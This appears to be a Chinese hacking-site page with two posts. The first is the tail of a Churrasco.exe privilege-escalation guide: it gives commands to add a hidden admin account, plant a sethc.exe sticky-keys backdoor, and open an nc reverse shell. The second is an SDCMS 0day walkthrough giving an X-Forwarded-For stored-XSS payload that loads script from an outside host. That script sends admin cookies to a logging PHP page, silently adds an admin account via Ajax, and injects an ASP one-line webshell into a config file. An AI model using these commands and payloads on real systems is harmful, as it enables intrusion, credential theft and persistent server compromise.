/churrasco/–>Found Thread: 704
/churrasco/–>Thread not impersonating, looking for another thread…
/churrasco/–>Found Thread: 712
/churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0xf24
/churrasco/–>Getting SYSTEM token from Rpcss Service…
/churrasco/–>Found szywjs Token
/churrasco/–>Found SYSTEM token 0xf1c
/churrasco/–>Running command with SYSTEM Token…

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!
在反弹回来的CMDSHELL里执行

C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add"
C:\RECYCLER\Churrasco.exe "net localgroup administrators iisuser /add"
C:\RECYCLER\Churrasco.exe

这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
如下 依次执行:

attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
del c:\windows\system32\sethc.exe
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h +r +s
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s

如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自用这方法成功替换过别人带有密码的SHIFT后门!
还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!

C:\RECYCLER\Churrasco.exe "copy d:\windows\explorer.exe d:\windows\system32\sethc.exe"
C:\RECYCLER\Churrasco.exe "copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "

还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!

Churrasco.zip

下载地址:http://www.vfocus.net/plus/download.php?open=0&aid=3912&cid=3

 
 
我的QQ空间
[Deny]htaccess文件的使用说明及应用
.htaccess 也叫"分布式配置文件",主要起到了针对目录改变配置...
 

SDCMS 漏洞分析 0day

| | 0 评论 |

  • 发布日期:2010-05.16 
  • 发布作者:Amxking 
  • 影响版本: 未知
  • 官方地址: http://www.sdcms.cn/ 
  • 漏洞描述: 
  • 看下面的代码,我们开始慢慢分析:

    (注: 这种方法是在管理员允许评论的时候,才能利用的,不过,一般管理员都会允许评论吧)

    在/plug/comment.asp中

     
     

    1. sub save_comment  
    2.   ……  
    3. username=sdcms_f.HTMLEncode(username)  
    4. content=sdcms_f.contentEncode(content)  
    5. ip=sdcms_f.getip '请看这里,这里得到用户的IP.  
    6. set rs=server.CreateObject("adodb.recordset")  
    7. sql="select username,content,ip,infoid,ispass from sd_comment" 
    8. rs.open sql,conn,1,3  
    9. rs.addnew  
    10. rs(0)=left(username,10)  
    11. rs(1)=content  
    12. rs(2)=ip //没有任何过滤, 直接插到了数据库中.  
    13. rs(3)=id  
    14. if sdcms_comment_ispass=1 then  
    15. msg_contents=",请等待审核" 
    16. rs(4)=0  
    17. else  
    18. rs(4)=1  
    19. end if  
    20. rs.update  
    21. ……  
    22. end sub  
    下面我们看下getip的实现吧,

    在/inc/function.asp中

     

    1. Public Function getip  
    2.  
    3. ip=request.ServerVariables("HTTP_X_FORWARDED_FOR")  
    4.  
    5. if ip="" then ip=Request.ServerVariables("REMOTE_ADDR")  
    6.  
    7. getip=ip  
    8.  
    9. End function  

    看到这里,大家都知道问题的存在了吧.作者通过" HTTP_X_FORWARDED_FOR"这个字段来得到IP的值,而我们知道,这个字段在数据包中是可以伪造的.

    我们可以伪造数据包,将"HTTP_X_FORWARDED_FOR"的值, 改成一句话木马提交, 这样, 就直接将一句话木马插进数据库里去了. 如果我们知道数据库的位置,并且数据库的后缀名是asp的,那么就直接可以利用了.

    但可惜,这个CMS的数据库的名称未知,在安装的时候, 由如下代码生成12个随机字符构成, 加上后缀名还是mdb的, 所以我们要插入一句话, 也没法利用的.

    /install/index.asp中

     

    Function get_something  

    1. Randomize  
    2. Do While Len(pass)<12 '随机密码位数  
    3. num1=CStr(Chr((57-48)*rnd+48)) '0~9  
    4. num2=CStr(Chr((90-65)*rnd+65)) 'A~Z  
    5. num3=CStr(Chr((122-97)*rnd+97)) 'a~z  
    6. passpass=pass&num1&num2&num3  
    7. loop  
    8. get_something=pass 
    9. end function  

     


    我们考虑用另外一种方式来达到入侵的目的.

    看如下代码:

    /admin/sdcms_comment.asp

     
     

    1. sub main  
    2.  
    3. echo "<form name=""add"" action=""?"" method=""post"" onSubmit=""return confirm('确定要执行选定的操作吗?');"">"  
    4.  
    5. page=request.querystring("page")  
    6.  
    7. if page="" or not isnumeric(page) then  
    8.  
    9. page=1 
    10.  
    11. end if  
    12.  
    13. pages =20 
    14.  
    15. set rs=server.CreateObject("adodb.recordset")  
    16.  
    17. if request("classid")<>0 then tj=" where infoid="&request("classid")&"" '这里还有一个注入漏洞,虽然上面用classid=sdcms.Requestint(classid)来得到其整数值,但放在sql中查询的时候,并没有用classid来查询,而是直接用request("classid")来查询,作者在防注入的时候,没有对其值进行过滤, 所以可以注入, 但这个注入的前提是有管理员权限, 所以,我们就不讨论了.  
    18.  
    19. sql="select id,username," 
    20.  
    21. if Is_sql=0 then  
    22.  
    23. sqlsql=sql&"(iif(ispass=1,'已审','未审'))"  
    24.  
    25. else  
    26.  
    27. sqlsql=sql&"(case ispass when 1 then '已审'else'未审' end)"  
    28.  
    29. end if  
    30.  
    31. sqlsql=sql&",ip,adddate,content,ispass,infoid from "&sd_table&" "&tj&" order by ispass,id desc"  
    32.  
    33. '作者用sql语句直接查出IP的值来,并用如下代码显示在了页面上,没有经过任何过滤.  
    34.  
    35. <td class="title_bg" style="text-align:left"><span style="float:right"><%if rs(6)=0 then%><a href="?action=pass&id=<%=rs(0)%>&t=1&classid=<%=classid%>">通过验证</a><%else%><a href="?action=pass&id=<%=rs(0)%>&t=0&classid=<%=classid%>">取消验证</a><%end if%> <a href="?action=del&id=<%=rs(0)%>&classid=<%=classid%>" onclick='return confirm("真的要删除?不可恢复!");'>删除</a></span><input name="id" type="checkbox" onClick="unselectall()" value="<%=rs(0)%>"> <%=rs(1)%> 发表于:<%=rs(4)%> IP:<%=rs(3)%></td> 
    36.  
  •  
    我们考虑到xss来攻击,等管理员查看,审核评论的时候, 执行恶意的js。

    Xss的概念这里就不详细介绍了,我们把" HTTP_X_FORWARDED_FOR"的值赋为<script src=http://www.xuehi.com/test.js></script>(我们把恶意的js写到test.js中)

    然后提交. 这里提交的方法也不再累赘了.可以抓包用nc提交, 也可以找到现成的工具提交, 当然,也可以自己写程序提交.

    这里注意,对方默认的这个ip的字段为50个字符长. 所以我们要控制好这个长度.

    对于这个CMS,其cookie由12个作者自定义的字符加管理员用户名和md5后的密码组成,

    所以我们得到了cookie, 就基本上得到了后台的权限.

    下面讲下test.js我们如何实现,

    如果写为


    Alert(document.cookie)

    这样,作者在审核的时候,就会弹出他的cookie来.我们当然不会这么用啦,我们要把cookie让其发送到远端的服务器上.下面的代码应该不会陌生了吧.

    Test.js内容:

    Var img = new Image();

    Img.src="http://www.xuehi.com/test.php?cookie="+document.cookie;

    Test.php的内容如下:

     
     

    1. <?php<br /> <br />Fputs(fopen('a.txt','a+'),$_GET['cookie'].'////');<br /> <br />?></p><p>这样,管理员访问这个页面后,就会在我们的服务器上生成a.txt,里面含有管理员的cookie,<br /> <br />我们有了cookie,就相当于有了管理员身份了.<br /> <br />进后台,修改cookie就可以进去.<br /> <br />当然,我们嫌这样麻烦不爽的话, 还可以利用ajax,让管理员自己添加一个帐号,方法如下:<br /> <br />function getXHR() {<br /> <br />var xhr = null<br /> <br />if (window.XMLHttpRequest) {<br /> <br />xhr = new XMLHttpRequest();<br /> <br />} else if (window.createRequest) {<br /> <br />xhr = window.createRequest();<br /> <br />} else if (window.ActiveXObject) {<br /> <br />try {<br /> <br />xhr = new ActiveXObject('Msxml2.XMLHTTP');<br /> <br />} catch( E ) {<br /> <br />try {<br /> <br />xhr = new ActiveXObject('Microsoft.XMLHTTP');<br /> <br />} catch(E) {}<br /> <br />}<br /> <br />}<br /> <br />return xhr;<br /> <br />}<br /> <br />var ajax = getXHR();<br /> <br />ajax.open('POST','/admin/sdcms_admin.asp? ?action=save&act=add ',false);<br /> <br />ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");<br /> <br />ajax.send("t0=test&t1=test&t2=1"); 

    这样,管理员浏览过评论后,就会自动添加一个帐号, 呵呵.

    这在我以前的文章中都提到过, 就不细讲了.

    接下来是如何拿shell. 我们看下后台写配置的地方的代码:

    在/admin/sdcms_set.asp中

    1. set fso=server.CreateObject("scripting.filesystemobject")  
    2.  
    3. set info=fso.CreateTextFile(Server.mappath("../inc/const.asp"),true)  
    4.  
    5. info.write "<" & "%" & vbcrlf  
    6.  
    7. ……  
    8.  
    9. info.write "%" & ">"  
    10.  
    11. info.close  
    12.  
    13. set info=nothing 
    14.  
    15. set fso=nothing 
    16.  

    作者将配置文件写到了/inc/const.asp中,

    而在

    1. sub save  
    2.  
    3. t0=clear_bad(trim(request("t0")))  
    4.  
    5. t1=clear_bad(trim(request("t1")))  
    6.  
    7. t2=clear_bad(trim(request("t2")))  
    8.  
    9. t3=clear_bad(trim(request("t3")))  
    10.  
    11. t4=clear_bad(trim(request("t4")))  
    12.  
    13. t5=clear_bad(trim(request("t5")))  
    14.  
    15. t6=clear_bad(trim(request("t6")))  
    16.  
    17. t7=clear_bad(trim(request("t7")))  
    18.  
    19. t8=clear_bad(trim(request("t8")))  
    20.  
    21. t9=clear_bad(trim(request("t9")))  
    22.  
    23. t10=clear_bad(trim(request("t10")))  
    24.  
    25. t11=clear_bad(trim(request("t11")))  
    26.  
    27. t12=clear_bad(trim(request("t12")))  
    28.  
    29. t13=trim(request("t13"))  
    30.  
    31. t14=dir_check(trim(request("t14")))  
    32.  
    33. t15=trim(request("t15"))  
    34.  
    35. t16=trim(request("t16"))  
    36.  
    37. t17=dir_check(trim(request("t17")))  
    38.  
    39. if t17<>"" then t17t17=t17&"/"  
    40.  
    41. select case t3  
    42.  
    43. case ".htm",".html",".shtml"  
    44.  
    45. case else:t3=".html" 
    46. end select  
    47.  
    48. select case t13  
    49.  
    50. case "0","1"  
    51.  
    52. case else:t13=0 
    53.  
    54. end select  
    55.  
    56. set sdcms_f=new sdcms_function  
    57.  
    58. t9=sdcms_f.check_event(t9,"|"):t10=sdcms_f.check_event(t10,"|"):t11=sdcms_f.check_event(t11,"|")  
    59.  
    60. set sdcms_f=nothing,  
    61.  
    62. 对其提交的参数进行了过滤.  
    63.  
    64. Function clear_bad(t0)  
    65.  
    66. clear_bad=Replace(t0,"""","")  
    67.  
    68. clear_bad=Replace(t0,CHR(10),"")  
    69.  
    70. End Function  
    71.  

    上面可以看到对t15,t16的值没有过滤.

    T16正好是系统管理,偏好设置中的文件名称项

    所以,我们将文件名称的值改为test"%><%execute request("value")%><%a="test

    这样, 我们就在/inc/const.asp文件中,写入了一句话木马.

    然后再上传大的webshell就OK了.

    参考:http://www.hackline.net/a/news/ldfb/web/2010/0516/3910.html

    我的QQ空间
    [Deny]htaccess文件的使用说明及应用
    .htaccess 也叫"分布式配置文件",主要起到了针对目录改变配置...
     


    所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]